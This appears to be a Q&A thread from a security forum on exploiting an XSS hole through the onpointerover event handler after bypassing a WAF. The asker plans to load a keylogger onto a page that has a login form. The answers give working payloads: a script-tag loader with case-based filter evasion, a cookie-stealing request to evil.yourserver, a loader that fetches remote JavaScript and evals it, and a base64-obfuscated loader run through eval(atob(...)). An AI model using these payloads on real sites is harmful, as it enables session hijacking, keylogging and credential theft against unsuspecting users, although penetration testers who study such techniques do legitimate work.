# Xss payload with onpointerover?

Tags: xss, javascript

I bypassed a WAF and found an XSS vulnerability using the `onpointerover` event handler. In the page where I found the vulnerability, there's also a login page.

What XSS payload can I use with the `onpointerover` to load an external javascript file inside the page?

Something like: `onpointerover="load.external.javascript/file.js"`

Comment: What about: ```onpointerover=prompt(document.cookie);```?

Comment: Hi @Jeroen,
That works and show an alert box with cookies but it's not what i'm looking for. I'm looking for something like `onpointerover=some-js-code-to-load-external-js` - I'd like to include a js keylogger script to demonstrate the full impact of the issue. I already have js keylogger script source code i just need to load it into the website via onpointerover.

Comment: What does the WAF stop? You can throw whatever JavaScript you want in the event listener, but not if the WAF is blocking keywords you need...

Comment: Hi @ConorMancone,

The WAF block almost all event handlers (onerror,onload, etc..) and some html code, it also block <script> and </script>. Also the injection occurs inside of an iframe src tag. I am able to break the src attribute and add onpointerover=js

Answer (score 1):

`onpointerover` is just an event that requires an event handler which you can specify inline as:

`onpointerover = (event) => { document.write('<script type="text/javascript" src="your_external_js"></script>'); };`

Or alternatively `document.getElementById('the_id').innerHTML("<script>...</script>")` etc...

I'm assuming your WAF evasion is based on JavaScript keywords in which case you'll need to tinker with the word **script** as it could get blocked. Try adjusting the case or encoding it if that's the case eg: ScRiPt etc...

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Answer (score 0):

Theoretically, if their WAF doesn't block it, you can just put the entire contents of your javascript in the event handler:

```
onpointerover="javascript:do_something();do_something_else();more_things();"
```

Of course this has some practical limits: if this is stored XSS then your full JS payload may not fit in the database if there is a small character limit.  Also, it increases the odds of accidentally running into another WAF rule.  Still, if you can keep your script short it is worth a try.  Personally I wouldn't bother with a keylogger, I'd just go for full cookie stealing:

```
onpointerover="javascript:(new XMLHttpRequest()).open('GET', 'https://evil.yourserver/steal?coookie=' + document.cookie);"
```

If you're lucky this will sneak past their WAF.  Another more flexible option might be something like:

```
onpointerover="javascript:(new XMLHttpRequest()).open('GET', 'https://evil.yourserver/javascript').addEventListener("load", function(){eval(this.responseText)}).send();"
```

Then you can have your server return whatever javascript you want.

Note that I haven't tested either of these thoroughly.  However, the general principles still apply.  You still run the risk of something in your payload triggering their WAF (for instance, they may block all requests that contain the word `eval`, making the second example useless), so you aren't home free yet.  Sometimes finding a payload that works against a WAF is an art more than anything else.  Finding an actual execution point though is an important first step.

Answer (score 0):

I was able to make it work. After looking for a lot of XSS Evasion methods i found a working one. I was able to load an external script using atob:

`id="base64-encoded-javascript-payload" onpointerover="eval(atob(this.id))`

Where `base64-encoded-javascript-payload` in this case was

`dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXl3ZWJzaXRlLmNvbS8xLmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==`

Thanks for the help!

Comment: Definitely a glaring XSS vulnerability on their part.  I'm surprised their WAF let `eval` through, but hey, makes it easier for you!

Comment: You probably could have just put your base64 encoded string directly in the call to `atob` as a string (encoded with single quotes), but either way that's a fun trick to keep in the back of my brain!